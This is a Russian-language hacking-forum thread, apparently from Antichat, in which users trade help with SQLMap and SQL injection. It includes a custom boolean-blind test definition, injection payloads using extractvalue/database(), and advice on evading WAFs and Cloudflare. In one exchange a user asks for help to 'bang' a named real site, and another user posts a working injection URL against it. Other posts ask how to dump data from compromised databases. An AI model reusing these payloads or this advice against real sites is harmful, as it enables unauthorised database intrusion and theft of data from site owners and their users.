Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. aparsera

    aparsera New Member

    Joined:
    19 Jun 2018
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Есть boolean based такого формата x.php?q=1' OR 1=1 OR 'bla'='bla

    Но мап ее не видит, подозреваю из-за OR OR
    Думаю, что надо подправить boolean_blind.xml, верно? кто может помочь правильно составить правило?

    upd

    изменил, теперь видит иньекцию, но говорит что false-positive, как это исправить?

    <test>
    <title>OR boolean-based blind - WHERE or HAVING clause</title>
    <stype>1</stype>
    <level>1</level>
    <risk>1</risk>
    <clause>1,9</clause>
    <where>2</where>
    <vector>OR [INFERENCE]</vector>
    <request>
    <payload>%27OR 1=1 OR %273%27=%273</payload>
    </request>
    <response>
    <comparison>%27OR 1=2 OR %273%27=%273</comparison>
    </response>
    </test>


    [03:55:45] [INFO] GET parameter 'q' appears to be 'OR boolean-based blind - WHER
    E or HAVING clause' injectable
    [03:55:51] [INFO] automatically extending ranges for UNION query injection techn
    ique tests as there is at least one other (potential) technique found
    [03:56:05] [WARNING] in OR boolean-based injection cases, please consider usage
    of switch '--drop-set-cookie' if you experience any problems during data retriev
    al
    [03:56:05] [INFO] checking if the injection point on GET parameter 'q' is a fals
    e positive
    [03:56:05] [WARNING] false positive or unexploitable injection point detected
    [03:56:05] [WARNING] GET parameter 'q' does not seem to be injectable
     
    #901 aparsera, 31 May 2019
    Last edited: 31 May 2019
  2. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    чтоб sqlmap видел вектор через OR нужно указать --risk=3
     
    _________________________
  3. Timon B.

    Timon B. Member

    Joined:
    11 Mar 2014
    Messages:
    14
    Likes Received:
    7
    Reputations:
    0
    Как можно обойти Cloudflare email protection, когда вместо емейлов в дампе : /cdn-cgi/l/email-protection" class="cf_email" data-
    Нашел IP за Cloudflare, поставил его в hosts фаил в Windows. Но sqlmap/python это игнорит.

    Спасибо
     
  4. den4ik1090

    den4ik1090 New Member

    Joined:
    21 Jan 2019
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Подскажите как в мапе докрутить:
    [​IMG]
     
  5. sepo

    sepo Member

    Joined:
    21 Jan 2017
    Messages:
    68
    Likes Received:
    25
    Reputations:
    18
    Всем привет, кто может, помогите долбануть этот сайт:
    Code:
    http://wrappers.ru/?act=polls&poll=1%22%27
     
  6. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,236
    Likes Received:
    26,250
    Reputations:
    148
    Что значит долбануть?
    Привет..
     
  7. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    1- вы ошиблись разделом
    2- там waf
    3- не ясно что вы ходите. Задайте точный вопрос или опишите проблему.
    Code:
    http://wrappers.ru/?act=polls&poll=1"+and+substring(@@version,1,1)=5+--+-
     
    #907 BabaDook, 21 Jun 2019
    Last edited: 21 Jun 2019
    erbolg and erwerr2321 like this.
  8. sepo

    sepo Member

    Joined:
    21 Jan 2017
    Messages:
    68
    Likes Received:
    25
    Reputations:
    18
    спасибо
     
  9. hubby666

    hubby666 New Member

    Joined:
    24 Jun 2019
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Всем привет, такой вопрос - есть куча ссылок которые нужно пройти, отдаю их мапу и ухожу, как сделать чтобы уязвимые ссылки как-то помечались, потому что он в аутпут складывает все как я понимаю, без разбора, то есть все пройденные. Спасибо.
     
  10. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    Проверьте запрос в ручную на что срабатывает WAF,обходите его и пишите свой tamper под него.
     
    _________________________
  11. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    it happens, use the old version
     
  12. BenderMR

    BenderMR Member

    Joined:
    23 Feb 2019
    Messages:
    65
    Likes Received:
    25
    Reputations:
    10
    День добрый, господа.
    Есть такая скуль:
    Code:
    https://site:com/?p1=v1&p2=v2&p3=v3&p4=v4%27,%20extractvalue(0x0a,concat/**/(0x0a,(select%20database()))))--+-
    Где вроде как insert statement, потому что если после ' не добавить еще один параметр через запятую, то выдается такая ошибка:
    Code:
     Column count doesn't match value count at row 1
    Подскажите, реально ли такое засунуть в мап и как это сделать?
     
  13. LeninDie

    LeninDie Member

    Joined:
    26 Dec 2015
    Messages:
    72
    Likes Received:
    8
    Reputations:
    2
    привет. подскажите как мапу указать на то какие данные меняются? скуля слепая
    в куках уязвим параметр identifyId: amplitude_idundefined={"optOut":false,"sessionId":null,"lastEventTime":null,"eventId":0,"identifyId":027179381' or 3726=3726--,"sequenceNumber":0} я так понимаю нужно добавить --string="а вот что здесь хз"
    [​IMG]
     
    #913 LeninDie, 5 Aug 2019
    Last edited: 5 Aug 2019
  14. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,174
    Likes Received:
    1,157
    Reputations:
    202
    у вас ответ а не запрос
     
  15. LeninDie

    LeninDie Member

    Joined:
    26 Dec 2015
    Messages:
    72
    Likes Received:
    8
    Reputations:
    2
    дополнил
     
  16. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Делайте через

    Code:
    https://site:com/?p1=v1&p2=v2&p3=v3&p4=v4%27*extractvalue(0x0a,concat/**/(0x0a,(select%20database()))))--+-
    
    https://site:com/?p1=v1&p2=v2&p3=v3&p4=v4%27-extractvalue(0x0a,concat/**/(0x0a,(select%20database()))))--+-
    
    https://site:com/?p1=v1&p2=v2&p3=v3&p4=v4%27/extractvalue(0x0a,concat/**/(0x0a,(select%20database()))))--+-
    и вариации
     
    _________________________
    BenderMR likes this.
  17. LeninDie

    LeninDie Member

    Joined:
    26 Dec 2015
    Messages:
    72
    Likes Received:
    8
    Reputations:
    2
    может кто нибудь подсказать решение?
     
  18. Baskin-Robbins

    Baskin-Robbins Reservists Of Antichat

    Joined:
    15 Sep 2018
    Messages:
    239
    Likes Received:
    809
    Reputations:
    212
    Ищи строку, которая всегда присутствует на неижектированной странице и неизменна(обязательно), но отсутствует при внедрении и false ответе
    Если добавляется какая-либо строка при false то использовать нужно --not-string="bsdhbhsb" , но при условии если она отсутствует при тру ответе
    По крайней мере так написано в манах
     
    BenderMR likes this.
  19. BenderMR

    BenderMR Member

    Joined:
    23 Feb 2019
    Messages:
    65
    Likes Received:
    25
    Reputations:
    10
    Ты скидывешь скрин ответа, нужен скрин запроса
     
  20. Estet

    Estet New Member

    Joined:
    30 Aug 2016
    Messages:
    33
    Likes Received:
    2
    Reputations:
    0
    Такой вопрос.
    Есть колонка Type допустим, строк 100к+, практически везде колонка пустая, но в некоторых есть данные.
    Можно ли как то сдампить только те что содержат данные?

    Какие там данные я не знаю, так можно было бы --where указать